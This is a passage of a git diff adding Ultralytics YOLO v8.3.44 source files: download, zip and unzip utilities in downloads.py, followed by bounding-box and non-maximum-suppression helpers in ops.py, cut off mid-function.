".DS_store" files should be deleted. + files_to_delete (tuple): The files to be deleted. + + Example: + ```python + from ultralytics.utils.downloads import delete_dsstore + + delete_dsstore("path/to/dir") + ``` + + Note: + ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They + are hidden system files and can cause issues when transferring files between different operating systems. + """ + for file in files_to_delete: + matches = list(Path(path).rglob(file)) + LOGGER.info(f"Deleting {file} files: {matches}") + for f in matches: + f.unlink() + + +def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True): + """ + Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is + named after the directory and placed alongside it. + + Args: + directory (str | Path): The path to the directory to be zipped. + compress (bool): Whether to compress the files while zipping. Default is True. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Returns: + (Path): The path to the resulting zip file. + + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. + """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = "https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." + ) + ) + for k, v in response.cookies.items(): + if k.startswith("download_warning"): + drive_url += f"&confirm={v}" # v is token + cd = response.headers.get("content-disposition") + if cd: + filename = re.findall('filename="(.+)"', cd)[0] + return drive_url, filename + + +def safe_download( + url, + file=None, + dir=None, + unzip=True, + delete=False, + curl=False, + retry=3, + min_bytes=1e0, + exist_ok=False, + progress=True, +): + """ + Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file. + + Args: + url (str): The URL of the file to be downloaded. + file (str, optional): The filename of the downloaded file. + If not provided, the file will be saved with the same name as the URL. + dir (str, optional): The directory to save the downloaded file. + If not provided, the file will be saved in the current working directory. + unzip (bool, optional): Whether to unzip the downloaded file. Default: True. + delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False. + curl (bool, optional): Whether to use curl command line tool for downloading. Default: False. + retry (int, optional): The number of times to retry the download in case of failure. Default: 3. + min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered + a successful download. Default: 1E0. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + progress (bool, optional): Whether to display a progress bar during the download. Default: True. + + Example: + ```python + from ultralytics.utils.downloads import safe_download + + link = "https://ultralytics.com/assets/bus.jpg" + path = safe_download(link) + ``` + """ + gdrive = url.startswith("https://drive.google.com/") # check if the URL is a Google Drive link + if gdrive: + url, file = get_google_drive_file_info(url) + + f = Path(dir or ".") / (file or url2file(url)) # URL converted to filename + if "://" not in str(url) and Path(url).is_file(): # URL exists ('://' check required in Windows Python<3.10) + f = Path(url) # filename + elif not f.is_file(): # URL and file do not exist + uri = (url if gdrive else clean_url(url)).replace( # cleaned and aliased url + "https://github.com/ultralytics/assets/releases/download/v0.0.0/", + "https://ultralytics.com/assets/", # assets alias + ) + desc = f"Downloading {uri} to '{f}'" + LOGGER.info(f"{desc}...") + f.parent.mkdir(parents=True, exist_ok=True) # make directory if missing + check_disk_space(url, path=f.parent) + for i in range(retry + 1): + try: + if curl or i > 0: # curl download with retry, continue + s = "sS" * (not progress) # silent + r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + assert r == 0, f"Curl return value {r}" + else: # urllib download + method = "torch" + if method == "torch": + torch.hub.download_url_to_file(url, f, progress=progress) + else: + with request.urlopen(url) as response, TQDM( + total=int(response.getheader("Content-Length", 0)), + desc=desc, + disable=not progress, + unit="B", + unit_scale=True, + unit_divisor=1024, + ) as pbar: + with open(f, "wb") as f_opened: + for data in response: + f_opened.write(data) + pbar.update(len(data)) + + if f.exists(): + if f.stat().st_size > min_bytes: + break # success + f.unlink() # remove partial downloads + except Exception as e: + if i == 0 and not is_online(): + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Environment is not online.")) from e + elif i >= retry: + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e + LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...") + + if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}: + from zipfile import is_zipfile + + unzip_dir = (dir or f.parent).resolve() # unzip to dir if provided else unzip in place + if is_zipfile(f): + unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress) # unzip + elif f.suffix in {".tar", ".gz"}: + LOGGER.info(f"Unzipping {f} to {unzip_dir}...") + subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True) + if delete: + f.unlink() # remove zip + return unzip_dir + + +def get_github_assets(repo="ultralytics/assets", version="latest", retry=False): + """ + Retrieve the specified version's tag and assets from a GitHub repository. If the version is not specified, the + function fetches the latest release assets. + + Args: + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + version (str, optional): The release version to fetch assets from. Defaults to 'latest'. + retry (bool, optional): Flag to retry the request in case of a failure. Defaults to False. + + Returns: + (tuple): A tuple containing the release tag and a list of asset names. + + Example: + ```python + tag, assets = get_github_assets(repo="ultralytics/assets", version="latest") + ``` + """ + if version != "latest": + version = f"tags/{version}" # i.e. tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. + download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.44/utils/ops.py b/2024.ultralytics/v8.3.44/utils/ops.py new file mode 100644 index 0000000..9a05b3a --- /dev/null +++ b/2024.ultralytics/v8.3.44/utils/ops.py @@ -0,0 +1,847 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). + """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. + """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. + max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. + """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. + """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = 